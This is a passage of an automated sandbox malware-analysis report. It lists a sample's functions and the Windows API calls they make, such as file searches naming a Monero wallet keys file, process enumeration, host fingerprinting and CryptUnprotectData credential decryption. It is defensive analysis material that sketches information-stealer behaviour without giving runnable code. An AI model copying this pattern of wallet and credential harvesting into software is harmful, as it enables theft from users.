LocalAlloc.KERNEL32(00000040,?), ref: 008B7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 008B7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008B7C62
LocalFree.KERNEL32(00000000), ref: 008B7D22

Strings

/ , xrefs: 008B7C7F

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 749c614033a6f344b56b130fb8afce16a266aff56d98285bc59d8efe97cb6fe9
Instruction ID: b2311b63783bc23a937f81d644470bf60702589d28d34d1e30fb24a18ba39ef7
Opcode Fuzzy Hash: 749c614033a6f344b56b130fb8afce16a266aff56d98285bc59d8efe97cb6fe9
Instruction Fuzzy Hash: A5414E7194021CABDB24DB94DC99BEEB778FF54700F2041D9E409A6291DB346F85CFA2

Function 008AE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,008C0D73), ref: 008AE4A2
StrCmpCA.SHLWAPI(?,008C14F8), ref: 008AE4F2
StrCmpCA.SHLWAPI(?,008C14FC), ref: 008AE508
FindNextFileA.KERNEL32(000000FF,?), ref: 008AEBDF

Strings

\*.*, xrefs: 008AE44D

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 3af9fcde20f7856ac19f53ce2f294aee60d0b39330bb9104177bbc409779603f
Instruction ID: 70707323791ac5ded2e45e8df2eb39c34d7d395bc17b36e0ce67a96d0d613904
Opcode Fuzzy Hash: 3af9fcde20f7856ac19f53ce2f294aee60d0b39330bb9104177bbc409779603f
Instruction Fuzzy Hash: EA121071910118AADB28FB68DCE6EED7338FF54300F4045A8B51AD6691EE346F49CB93

Function 008B9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008B961E
Process32First.KERNEL32(008C0ACA,00000128), ref: 008B9632
Process32Next.KERNEL32(008C0ACA,00000128), ref: 008B9647
StrCmpCA.SHLWAPI(?,00000000), ref: 008B965C
CloseHandle.KERNEL32(008C0ACA), ref: 008B967A

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ec3d7068c67755e2b1bfa2b23248cb5d7b9689a62c6e776467fc98112b9e30a9
Instruction ID: eb36af371deb95ff30ce8d68b3bcc4036dda87670f57dfdd20b3ab6c314aaaf5
Opcode Fuzzy Hash: ec3d7068c67755e2b1bfa2b23248cb5d7b9689a62c6e776467fc98112b9e30a9
Instruction Fuzzy Hash: EA010CB5A00208ABDB14DFA5CD98BEDBBF8FB68300F104188E94AD6240E734AB41CF51

Function 008B8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008C05B7), ref: 008B86CA
Process32First.KERNEL32(?,00000128), ref: 008B86DE
Process32Next.KERNEL32(?,00000128), ref: 008B86F3

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

CloseHandle.KERNEL32(?), ref: 008B8761

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: a23ae453fb4d1534f6cd085c4eab6d7fd15131e58926f9134745c2b7dc8a159e
Instruction ID: e98e711a0839df43980420e4c07834c0bcbfcd6eec28ac6efc6647519386b36f
Opcode Fuzzy Hash: a23ae453fb4d1534f6cd085c4eab6d7fd15131e58926f9134745c2b7dc8a159e
Instruction Fuzzy Hash: 8D314D71901218EBCB28DF94CC95FEEB778FB55700F1041A9E50AE62A0DF346A45CFA2

Function 008B7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0127E020,00000000,?,008C0E10,00000000,?,00000000,00000000), ref: 008B7A63
RtlAllocateHeap.NTDLL(00000000), ref: 008B7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0127E020,00000000,?,008C0E10,00000000,?,00000000,00000000,?), ref: 008B7A7D
wsprintfA.USER32 ref: 008B7AB7

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 79bfc45cc620d2a703e47e405a6725203058de873d3cf683861ba7509dcfd33c
Instruction ID: df3334470b3139f44073c2a73c150475af62f7e4f2b0b1e8db5ff299bdcb1074
Opcode Fuzzy Hash: 79bfc45cc620d2a703e47e405a6725203058de873d3cf683861ba7509dcfd33c
Instruction Fuzzy Hash: 95117CB1945228EBEB20CF54DC49FA9BB78FB44721F10429AE91A972C0D7746A40CF51

Function 008A9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 008A9BA3
LocalFree.KERNEL32(?), ref: 008A9BD3

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: d8779b8867db0474284f4e841707f567d86fa6cca2f814279e4da5cd494cc734
Instruction ID: e509c637f0d0597646d7594c0401bf86228f984d9e7108c71410f739267100ca
Opcode Fuzzy Hash: d8779b8867db0474284f4e841707f567d86fa6cca2f814279e4da5cd494cc734
Instruction Fuzzy Hash: 281109B8A00209EFDB04DF98D985AAEB7B5FF8D304F104598E915AB350D770AE11CFA1

Function 008B78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: abd821a9d3789ad7007a6f2e314d96a48d96fac14e115a704075b626821ddeca
Instruction ID: 83bdfdb157053bc6754a5c7c025fe0be1e1cdaa271e5bd35e7c98785826775c6
Opcode Fuzzy Hash: abd821a9d3789ad7007a6f2e314d96a48d96fac14e115a704075b626821ddeca
Instruction Fuzzy Hash: C70186B1904349EFC710DFD4DD45BAABBB8F744B21F104219F645E7380D77859048BA2

Function 008B7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
